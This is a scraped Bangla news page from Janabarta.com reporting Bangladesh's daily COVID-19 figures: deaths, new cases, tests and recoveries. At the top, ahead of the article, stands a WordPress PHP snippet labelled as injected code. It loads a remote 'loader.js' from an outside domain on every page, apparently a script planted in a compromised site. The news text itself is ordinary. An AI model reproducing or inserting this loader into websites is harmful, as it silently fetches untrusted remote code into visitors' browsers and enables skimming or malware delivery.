// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site ২৪ ঘণ্টায় মৃত্যু ৪৩, শনাক্ত ৩৪১২ - Janabarta.com

২৪ ঘণ্টায় মৃত্যু ৪৩, শনাক্ত ৩৪১২

স্বাস্থ্য অধিদপ্তরের অতিরিক্ত মহাপরিচালক অধ্যাপক ডা. নাসিমা সুলতানা

নিজস্ব প্রতিবেদকঃ গত ২৪ ঘণ্টায় দেশে মরণঘাতী করোনাভাইরাসে আরো ৪৩ জনের মৃত্যু হয়েছে। এ নিয়ে দেশে ১ হাজার ৫৪৫ জনের মৃত্যু হলো। এ ছাড়া একদিনে আরো ৩ হাজার ৪১২ জনকে আক্রান্ত হিসেবে শনাক্ত করা হয়েছে। এ নিয়ে দেশে আক্রান্তের সংখ্যা দাঁড়ালো ১ লাখ ১৯ হাজার ১৯৮ জন।

bd update 8may

আজ মঙ্গলবার স্বাস্থ্য অধিদপ্তরের করোনা সংক্রান্ত নিয়মিত বুলেটিনে এসব তথ্য জানানো হয়। বুলেটিনে তথ্য উপস্থাপন করেন স্বাস্থ্য অধিদফতরের অতিরিক্ত মহাপরিচালক অধ্যাপক ডা. নাসিমা সুলতানা।

তিনি জানান, ৬৫টি ল্যাবে গত ২৪ ঘণ্টায় নমুনা সংগ্রহ হয়েছে ১৭ হাজার ৫৬৩টি। পরীক্ষা করা হয়েছে ১৬ হাজার ২৯২টি নমুনা। এর মধ্যে ৩ হাজার ৪১২ জনকে আক্রান্ত হিসেবে শনাক্ত করা হয়েছে। এ নিয়ে দেশে আক্রান্তের সংখ্যা বেড়ে দাঁড়ালো ১ লাখ ১৯ হাজার ১৯৮ জন। 

sample test in bangladesh

স্বাস্থ্য অধিদপ্তরের এ কর্মকর্তা আরো জানান, গত ২৪ ঘণ্টায় ৮৮০ জন সুস্থ (হাসপাতাল ও বাসা মিলে) হয়েছেন। এ পর্যন্ত মোট সুস্থ হয়েছেন ৪৭ হাজার ৬৩৫ জন। শনাক্ত বিবেচনায় সুস্থতার হার ৪০.৩৮ শতাংশ।

দেশে প্রথম করোনা রোগী শনাক্ত হয় গত ৮ মার্চ। আর করোনা আক্রান্ত ব্যক্তির প্রথম মৃত্যু ঘটে ১৮ মার্চ।